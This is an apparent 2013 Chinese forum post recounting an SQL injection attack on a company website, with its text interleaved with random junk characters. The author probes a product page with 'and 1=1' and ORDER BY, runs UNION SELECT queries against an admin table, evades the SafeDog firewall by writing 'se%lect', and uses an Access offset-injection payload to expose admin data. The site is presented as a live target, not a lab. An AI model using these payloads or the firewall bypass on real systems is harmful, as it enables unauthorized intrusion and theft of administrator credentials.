打开网站,一个企业站。! }% b, W( A; n
; Z8 C' x" l2 v; m: G8 \+ Z# C9 v
1 @8 M: S/ [5 I5 t9 p
顺手加个admin. d5 h# ^& }: ]$ z% e1 \+ h! S; r& s/ x) P
( K" e: D6 a, k' |* D/ \) {+ A
7 D# ]# E" k, ~& \$ x
默认后台。' t# {, r; \7 u+ H$ O9 |! e
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。. T" d* N, T( p* o0 y
" d, w o% w' w# i
, |7 B S9 Y( u! n; {
1 q* ]$ F. q4 t6 L5 y* c6 }7 t! J所以就不用御剑扫了,待会直接封IP。2 Q6 ]' L- h% j8 a- W* B/ C+ g
& V: Y* V/ g' O, ~7 `# W% e用order by语句判断是否存在注入。
. p7 M+ s" e. S+ Z. bhttp://www.xxx.com /product_show.asp?id=997 order by 1 w' Y' K& S$ T) t
http://www.xxx.com /product_show.asp?id=997 order by 1000 s: ?) Q# U) j0 y- d/ K- L
现在存在注入,经测试后发现是9个字段。0 `4 k+ m# `5 _+ ~$ ?" ^
# L1 ^: M) P3 z0 O+ x- j: q# g9 t接下来进行联合查询,猜是否存在admin表。
4 Y5 M S1 J+ D7 l5 ~http://www.xxx.com /product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
( I9 j; d& u; T9 X) b
4 e0 t ]; x$ K5 d# s1 o3 W" C# v% f5 \3 C% K9 _' u+ D, w, W
# t3 h, A6 l) D4 N- l. I0 V
在select中间加个%,se%lect绕过安全狗。
( |+ ?- D, Z7 c9 u( O+ Y5 }
2 l- R: L$ ~6 b$ T2 q A
$ ?. s; O4 H1 L; L. m发现存在admin表,然后开始手工猜常用的字段。
8 X) O/ s/ f5 s纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
8 n/ ]# k/ o0 l- x' ~ / P& B) t3 {6 d9 ~. [- L
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
* s& H5 R$ B7 y
3 P9 G3 V, f; u6 [& X1 t+ u科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
( J% T" _3 f$ r: j+ Vhttp://www.xxx.com /product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
# }: ^; n* k* L4 p3 N好了,敏感内容出显了。
' c) f( H' |; N" E W/ O; ]
. h7 M/ |% e1 z" D) l$ i) E3 M+ |" N- p" Q
% Z- A& t3 o& }7 i4 u4 Q |
发表于 2013-3-8 21:49:45
收藏
支持
反对